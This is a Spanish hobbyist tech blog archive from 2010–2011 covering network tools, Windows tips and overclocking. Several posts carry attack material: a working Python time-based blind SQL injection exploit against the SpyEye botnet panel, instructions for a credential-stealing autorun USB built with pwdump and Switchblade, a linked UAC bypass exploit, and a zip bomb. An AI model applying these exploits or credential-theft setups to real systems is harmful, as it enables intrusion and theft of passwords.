lunes, 3 de octubre de 2011

Byzantium Proyect

Cual es el mayor problema de la información ? en principio la manipulación , y cual es el mayor problema de la manipulación ? el control de la misma. Ya hemos visto en varias ocasiones como el gobierno de varios paises cortaba la comunicación con el resto de el mundo para que no se vieran las cosas tan **** que se hacen en tiempos de guerra o amenaza de seguridad. Este hecho ha llevado a numerosos activistas a considerar cada vez mas el cableado de internet como un nuevo poder politico manipulable. En consecuencia nace el proyecto Bizancio para un futuro "internet casero" en el que poder conectarse sin necesidad de que los gobiernos o ISP hagan de intermediarios, espien nuestros dados especulando con nuestras estadisticas o manipulacion de datos para su beneficio. Su idea es basarla en una red de malla que básicamente funcionaria haciendo que todos sus usuarios fueran nodos y ala vez esten interconectados entre si (como los buenos bichos jeje). El promotor de la idea (en los EUA) es una persona llamada "TheDoctor" que oculta su nombre real por diversas razones , este activista defiende la idea de un internet totalmente libre , y no un internet de pertenezca a 4 empresas , tambien apuesta por el fusilamiento de la creacion de falsos "Dioses" como Mark Zuckerberg (fb) o Steve Jobs a la que la gente los trata como tales en su Olimpo digital. FuEnTe

martes, 20 de septiembre de 2011

Descubierta Vulnerabilidad en Spyeye

SpyEye es un malware con capacidades de puerta trasera que intenta robar información sensible relacionada con la banca en línea y las transacciones de tarjetas de crédito de la máquina infectada. SpyEye se vende a través de su autor en un formato fácil de configurar forma de kit, que contiene el ejecutable del troyano en sí, el mando y control (C & C) del servidor y la configuración básica para orientar sitios web de banca. A partir de principios de 2011, SpyEye se ha fusionado la funcionalidad de la familia troyano Zeus, que ha sido vendida al autor SpyEye, y ahora es cada vez más sofisticados en lo que respecta a las características y funcionalidad,En agosto de el 2011 se libero el codigo. En agosto de el 2011 se libero el código fuente de el malware y 1 mes mas tarde ya tenemos la primera vulnerabilidad con el primer exploit generado , afecta a las siguientes firmas :


Trojan-Spy.Win32.SpyEyes.evg (Kaspersky)
PWS-Spyeye.m (McAfee)
Trojan:Win32/EyeStye.H (Microsoft)
A variant of Win32/Spy.SpyEye.CA (NOD32)
W32/Malware.QOOC (Norman)
Trojan.Zbot (Symantec)
Mal_Xed-24 (Trend Micro)



Python Code: fuente

from httplib import HTTPConnection from time import time from sys import exit, argv, stdout import urllib  print """   Example:                                                           Spypwned 192.168.0.12 /directorio/ "version()"                           """   if len(argv)<=3: exit() else:   print "[+]Iniciando..."   host = argv[1] path = argv[2] sql = argv[3] port = 80    hash = "" full = []   for k in range(48,122):      full.append(k) full.append(0) # full vale [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0] # Es el charset a probar  delay = 0.5 a=1  while a <= 32:     for i in full:         j = 0         if i == 0:  exit('\n[+]FIN\n')         #         start = time()         # hora de inicio para el delay         conn = HTTPConnection(host,port)         #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" }         values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" }         data = urllib.urlencode(values)         print data         conn.request("GET", path + "frm_cards_edit.php?" + data )         response = conn.getresponse()         read = response.read()              print read                   if response.status == 404: exit('[+]404')         # da 404 luego termina         now = time()         if now - start > delay:         # ha salido true luego el caracter es valido             stdout.write(chr(i))             stdout.flush()             hash += chr(i)             a += 1             break;         else: j += 1         print "i vale %s, y J vale %s" %(i,j)


Tambien disponemos de un tracker , que nos avisa en todo momento los bots que hay conectados a la red , direcciones , nacionalidades y estados.

lunes, 19 de septiembre de 2011

NetworkMiner 1.1

NetworkMiner es una herramienta de análisis forense (NFAT) para Windows. NetworkMiner se puede utilizar como un sniffer de red pasivo / o como herramienta de captura, con el fin de detectar sistemas operativos, sesiones, host, etc . NetworkMiner también puede analizar los archivos PCAP para análisis fuera de línea y regenerar / ensamblar archivos transmitidos y los certificados de los archivos PCAP.

NetworkMiner recopila los datos (por ejemplo, las pruebas forenses) sobre las máquinas de la red en lugar de recoger datos sobre el tráfico en la red. La vista de la interfaz de usuario principal está centrado en host (información agrupada por host) en lugar de centrado en paquetes (información que se presenta como una lista de paquetes / cuadros).

web y descarga















viernes, 6 de mayo de 2011

OpenVas

OpenVAS ( en un principio GNessUs , que viene de el famoso Nessus) es un marco de diversos servicios , herramientas y tests , que ofrece un análisis de vulnerabilidad y la solución de gestión de vulnerabilidades.
El escáner de seguridad real se acompaña con una alimentación diaria actualizada de la Red de Pruebas de Vulnerabilidad (NVTs), más de 21.000 (a fecha de mayo de 2011).

La primera vez que lanzamos el OpenVas hay que hacer 2 cosas basicas , la primera es crear un certificado : openvas-mkcert (hay que poner valores que existan, no tienen que ser reales) y la segunda es crear un usuario en el servidor : openvas-adduser (creamos el user y salimos con CTRL+D). Antes de arrancar el servidor hay que actualizar la lista de plugins con el commando : openvas-nvt-sync (tambien tarda lo suyo..) una vez terminado , lanzamos el servidor con : openvassd (es normal que se tome su tiempo al lanzar el server ya que son mas de 20.000 plugins) .
Una vez que esta todo configurado en el servidor (y esta lanzado) podemos empezar con el cliente (que es desde el que lanzamos los tests) lo lanzamos con : OpenVAS-Client , una vez arrancado lo conectamos al servidor con el usuario y password que creamos antes con el openvas-adduser (echo esto tendremos acceso a todos los plugins y podremos hacer tests a la ip que queramos)

martes, 15 de marzo de 2011

Configurando Squid

Squid es un proxy-cache que sirve para acelerar la carga de webs almacenando gran parte de ellas en el disco duro (de el proxy)
Supongamos que ya teneis instalado Squid en vuestro S.O. (yo lo instale en la backtrack 4 r2) , yo lo he tenido que instalar con : apt-get install squid (antes actualiza el apt). Squid se configura desde el fichero: /etc/squid.conf con cualquier editor de texto.
Lo primero que vamos a modificar es el puerto de escucha de el proxy que por defecto viene asi :http_port 3128 y que nosotros vamos a sumar esta otra linea debajo de la otra (asi escuchara en los 2 puertos , evitar dejar espacios vacios) :http_port 8080 . Lo siguiente es saber de cuanta ram disponemos , si tenemos mas de 128 mb/RAM tendremos que buscar la siguiente linea,#cache_mem 8 MB , la descomentamos (le quitamos el #) y la dejamos asi: cache_mem 16 MB , por defecto funciona a 8MB aunque esta linea este comentada.
El siguiente paso es configurar el cache en disco , para eso buscamos la linea: cache_dir ufs /var/spool/squid 100 16 256 , se puede incrementar tanto como el disco duro nos deje , la siguiente linea aumenta el almacenamiento de webs a 500mb : cache_dir ufs /var/spool/squid 500 16 256 ,los numeros 16 y 256.
Lo siguiente seria hacer listas de control de acceso que definan el rango de ip de tu red o bien solo algunas maquinas. Para ello buscaremos la siguiente sintaxis: acl (nombre de la lista) src (ip o rango de ips) si queremos establecer una lista que incluya toda nuestra red, suponiendo que nuestro rango de ip seria 192.168.3.x con mascara de subred 255.255.255.0, tendriamos que incorporar la siguiente linea a nuestro squid.conf: acl proxyhosts src 192.168.3.0/255.255.255.0 ,tambien podemos hacerlo atraves de un fichero : acl proxyhosts src "/etc/squid/proxyhosts" y el fichero quedaria algo asi :
192.168.3.2
192.168.3.22
192.168.3.5
192.168.3.55
192.168.3.21

Las reglas de control de acceso se aplicarian a las listas de control de acceso , estas deben de situarse despues de la siguiente linea: # INSERT YOUT OWN RULE(S) HERE TO ALLOW ACCESS FROM YOU CLIENTS
la linea basica seria asi : http_access (deny o allow) (lista de control de acceso) , si quisieramos permitir la lista que creamos llamada proxyhosts tendriamos que escribir la siguiente linea: http_access allow proxyhosts
si todo ha salido bien deberiamos de configurar el proxy en los ordenadores que lo vayan a usar con la ip de el servidorproxy y el puerto que configuramos antes ej: 192.168.3.5:8080. Para lanzar el proxy podeis escriber squid en cualquier consola , para reiniciar el servicio : service squid restart (bastante util para depurar errores) y para pararlo service squid stop .

jueves, 10 de marzo de 2011

Ntop

Ntop es un Sniffer con gestion via web imprescindible para cualquier red, los protocolos que es capaz de monitorizar son: TCP/UDP/ICMP, (R)ARP, IPX, DLC, Decnet, AppleTalk, Netbios, y ya dentro de TCP/UDP es capaz de agruparlos por FTP, HTTP, DNS, Telnet, SMTP/POP/IMAP, SNMP, NFS, X11 , es muy util a la hora de ver quien consume mas ancho de banda en una red , o para saber que dispositivos hay en tu red y que es lo que hacen ^^. Si no lo teneis ya descargado, os lo podeis bajar de su web o desde el apt , aptitude o cualquier gestor de paquetes , esta disponible en windows y linux , lo que pasa es que creo que para win necesita licencia .....
Una vez instalado , el primer paso es asignarle una password al Administrador de el ntop , para eso abrimos una root-shell , y ejecutamos:
ntop --set-admin-password
ahora hay que lanzarlo , podemos lanzarlo directamente:
ntop
o podemos lanzarlo como servicio:
service ntop start
una vez lanzado nos creara un servidor web desde el que podemos configurar todo el software he incluir plugins y al que podemos acceder abriendo un navegador , escribiendo nuestra ip y el puerto 3000 , algo asi : 192.168.1.69:3000 , tambien podemos : 127.0.0.1:3000



jueves, 16 de diciembre de 2010

Windows Vista/7 UAC Bypass Exploit

Exploit en el UAC de windows 7 y vista, para ganar la preciada cuenta system escalando permisos desde una cuenta limitada o estandar , para usarlo es muy facil simplemente nos bajamos la app (dentro viene un video que lo explica bien claro xD) , abrimos una consola y lo ejecutamos (poc.exe) , ganando permisos completos para todo el windows (probado en cuentas restringidas y de administracion.)
descargar desde la fuente

viernes, 8 de octubre de 2010

Carpetas Compartidas entre Windows 7 y Windows 2000 Server

Si habeis intentado entrar en las carpetas compartidas de un w2000 server desde un windows7 habreis comprobado que no funciona , el problema es que w7 para poder comunicarse con el w2000 tenemos que tener activada una opcion llamada "Enviar respuestas LM y NTLM" si no , no se entienden , para llegar abrimos el panel de control-Herramientas administrativas-Directiva de seguridad local , despues en directivas locales-opciones de seguridad-seguridad de red: nivel de autenticación de LAN Manager y ahi selecionamos la opcion: "Enviar respuestas LM y NTLM" aplicamos y aceptamos. Haciendo esto, tambien se repara el error al añadir una impresora compartida en w2000s.
Para los w7 que no tienen acceso a las opciones de directivas (o las tienen mas ocultas,) podemos haceder desde el regedit , buscando la clave : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
si no existe creamos una nueva clave DWORD con el nombre "LmCompatibilityLevel" configuramos el valor 1 que seria activar la opcion "Enviar Respuestas LM y NTLM" reiniciamos y listo.

lunes, 2 de agosto de 2010

God mode (Modo dios) en Windows 7

Cual es el gran problema de cambiar de windows cada 2 años , pues que ya estabas acostumbrado al s.o. viejo y en el nuevo cambia todo , la forma de acceder a los usuarios , etc , etc . Bien pues he aqui el modo dios de el windows 7 (no vale " i d d q d " xDD) en el que tendras todas las opciones de el windows (o casi todas) bien ordenadas y faciles de encontrar , solo teneis que crearos una carpeta en el escritorio , y cambiarle el nombre por : Modo Dios.{ED7BA470-8E54-465E-825C-99712043E01C}

lunes, 12 de julio de 2010

Instalar cualquier impresora en red desde Windows 7

Bien pues lo primero que intente al instalar una impresora en el windows 7 fue a darle a "conectar" desde los recursos compartidos de el ordenador que tiene compartida la impresora (windows xp) , claro esto no funciona y nos tira un error 0x000003e3 y nos dice algo como que no a podido llevarse a cabo la operacion . Bueno pues lo primero que hay que hacer es instalar una impresora desde 0 y en local , para eso nos vamos a dispositivos e impresoras y agregamos una nueva impresora, en el siguiente paso elegimos "Agregar una impresora en local " en la siguiente ventana elegimos "Usar un puerto existente LPT1 " despues hay que instalar los drivers , lo suyo es que tengas los drivers de tu impresora para el windows 7 , pero como hay algunos que todavia ni existen, como los de la Minolta Di2011 o la Minolta Di3500, pues tenemos que instalarla de alguna forma, asi que intentamos colarle un driver que no sea de su impresora para que pueda imprimir (el mas generico posible).
He usado para las impresoras Di2011 , Di3500 y la hp laserjet 1100 los drivers de la HP laserjet 4200/4300 PLC 6 y tambien el driver de la Laserjet 2200 sin ningun problema , una vez instalados los drivers , nos vamos a la impresora instalada y le damos a "Propiedades de Impresora " pinchamos en la tercera pestaña "Puertos" despues en "Agregar Puerto" y en Local Port en "Puerto Nuevo" en el recuadro que pone escriba el nombre de el puerto tenemos que escribir la ruta de la impresora que como esta en red pondremos algo como \\servidor\MinoltaDi donde \\nombredeservidor y \nombre impresora tambien puedes hacerlo por la ip \\192.168.0.1\HPlasejet predeterminas el puerto que acabas de crear como el que se va usar y aplicas , logicamente tienes que tener permisos en el equipo donde tienes la impresora compartida , bien y con esto tendrias instalada cualquier impresora en windows 7.

viernes, 9 de julio de 2010

i3 530 a 4500 Mhz

Bueno pues he seguido exprimiendo el i3 530 y he conseguido sacarle los 4500 subiendo el bus a 204 que x 22 (de el multiplicador) son los 4501 Mhz , subiendole el voltaje a la ram hasta 1,9V , el voltaje de el micro a 1,5V y la frecuencia de la ram a 613 x 2 = 1226 Mhz con latencias bajas de 7-7-7-20 y desconectando todas las tecnologias de intel , incluida la opcion e de la virtualizacion y tambien la que anula 2 threads de los 4 que tiene el micro, dejandolo con 2 cores y 2 threads , haciendo esto baja mucho la temperatura y te deja jugar mas pero pierde rendimiento , lo maximo que he conseguido sacar con estas memorias (kingston pc3-10700) y con el disipador de stock es :
2 cores y 4 threads = 4083 Mhz estables
2 cores y 2 threads = 4501 Mhz estables

jueves, 24 de junio de 2010

Oceando i3 530

Bueno pues ha pasado por mis manos el i3 530 y ya lo he subido hasta los 4083 Mhz estables , con el ventilador de stock , sin subirle el voltaje simplemente subiendole el bus a 185 ya que a partir de esa cifra tengo que ajustar voltajes/aparte de la temperatura , ahora mismo me esta tirando temperaturaturas entre 60-65 idle 90-100 en full , asi que este micro bien refrigerado y con una placa un poco mejor seguramente se nos ponga facilmente en los 5.00 Ghz, con un multiplicador tan alto es mas facil .

martes, 8 de junio de 2010

Vulnerabilidad Usb U3

El ataque se basa en la opción de autorun que hasta el sp3 de el windows xp venia activado por defecto ,esta opción afecta a cualquier dispositivo CD/USB que sea introducido en el ordenador ejecutando el fichero autorun.inf , teniendo esto en cuenta se puede modificar el autorun.inf para ejecutar lo que queramos. Algunos USB al introducirlos te crean la unidad virtual U3 sin preguntar ni naa, bueno la idea es modificar la memoria U3 (por llamarla de alguna forma) de estos USB y modificarla a nuestro gusto , bien para eso existe la app Universal U3 Launch pad, que sirve para pasarle al USB una iso ya modificada a nuestro gusto , para eso tenemos un pack de herramientas (pwdump, mailpassview,etc) ya automatizado y comprimido en una iso, esa iso se encuentra en la applicacion swichblade solo teneis que copiarla de el swichblade a la carpeta bin de el Universal U3 launch pad y lo ultimo seria copiar el archivo SBconfig.exe en la carpeta raiz de el USB y activarlo, despues lanzamos el Universal , automaticamente te hara un backup y sobrescribira tu memoria U3 en el USB.

fuente mejor explicada xDD
contraseña : appstrike

lunes, 31 de mayo de 2010

Quake-Catcher Network






Quake-Catcher Network es un programa informático que, gracias a la sensibilidad del movimiento de los acelerómetros que los equipos portátiles instalan de serie (con algunos viejos no funciona), es capaz de medir y clasificar los terremotos. La velocidad a la que viaja la información por Internet es más rápida que las ondas sísmicas, lo que daría unos valiosos segundos a la gente para alejarse del epicentro.

mas informacion aqui
para descargar aqui
y su web es esta

miércoles, 26 de mayo de 2010

Manual XSS

Manual para aprovechar las vulnerabilidades XSS, como la que hace poco afecto a la web de la presidencia española.

descargar aki

martes, 18 de mayo de 2010

Speccy y Recuva

Speccy es una app que da información estadística detallada sobre cada pieza de hardware de su ordenador. Por ejemplo CPU, placa base, memoria RAM, tarjetas gráficas, discos duros, unidades ópticas, soporte de audio. Además añade Speccy las temperaturas de sus diferentes componentes, de esta manera puede ver si hay un problema!

* La marca y modelo del procesador
* Hard tamaño de la unidad y la velocidad
* La cantidad de memoria (RAM)
* Tarjeta gráfica
* Sistema operativo

para descargar



Recuva es una app que recupera archivos borrados accidentalmente, archivos perdidos por crasheos inexperados de el sistema operativo , tambien recupera archivos de dispositivos como camaras digitales , reproductores de Mp3 y otros .

para descargar

lunes, 10 de mayo de 2010

Anomos cifrado p2p

Anomos es un encriptador de redes p2p con estas caracteristicas:
* Libre y de Código Abierto Código
* Sin publicidad, sin spyware
* Standalone Client - n servicios en segundo plano
* Fácil de usar
* Disponibilidades para Windows y GNU / Linux (y OSX, teóricamente)


para mas informacion su web es esta y para descargar aki.

miércoles, 5 de mayo de 2010

Ethergrouik

Ethergrouik es un proyecto open source (C + GTK) cuyo objetivo principal es representar graficamente las conexiones por protocolos de red, con una interfaz que nos recuerda al mitico etherape pero con alguna opcion extra.
esta disponible para windows y linux , su web es esta y para descargar aki

martes, 20 de abril de 2010

El zip de la muelte


42.zip es un fichero zip de 42.374 bytes, contiene 16 zips que a su vez contienen otros 16 zips y así hasta 6 veces. Los 16 últimos zips contienen un fichero de 4,3 Gb cada uno. Si descomprimimos el fichero 42.zip de 42.374 bytes obtendriamos 4.5 Pb de datos descomprimidos.

Casi todos los antivirus lo tienen detectado en su base de datos , aunque ante una cosa asi, que es capaz de "frezeear" cualquier ordenador , cualquier proteccion extra sera muy util ya que para ataques DDos es muy tentador xDD

  • 16 x 4294967295 = 68.719.476.720 (68GB)
  • 16 x 68719476720 = 1.099.511.627.520 (1TB)
  • 16 x 1099511627520 = 17.592.186.040.320 (17TB)
  • 16 x 17592186040320 = 281.474.976.645.120 (281TB)
  • 16 x 281474976645120 = 4.503.599.626.321.920 (4,5PB)
fuente
descarga

lunes, 1 de marzo de 2010

Key finder

Alguna vez os ha pasado que quereis recuperar el serial de alguna app ya instalada (para volver a instalar o por si vais a formatear) y la propia app no os deja recuperar la clave , bueno pues este programa es para eso mismo, saca los serials de los programas ya instalados.

para descargar web de el autor